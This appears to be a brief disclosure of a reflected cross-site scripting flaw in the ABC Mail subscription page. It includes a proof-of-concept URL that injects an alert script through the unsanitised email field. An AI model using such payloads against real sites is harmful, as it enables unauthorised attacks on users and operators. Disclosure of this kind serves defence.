The ABC Mail subscription script fails to sanitise the email field or check that a valid email was provided. An attack can easily be executed as the unsanitized “invalid email” is printed on the produced error page.
Code:
|
1 2 3 |
http://abcmail.net.au/subscribe/subscribe.tml? email=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E &list=abc-tv-countdown-to-3 |
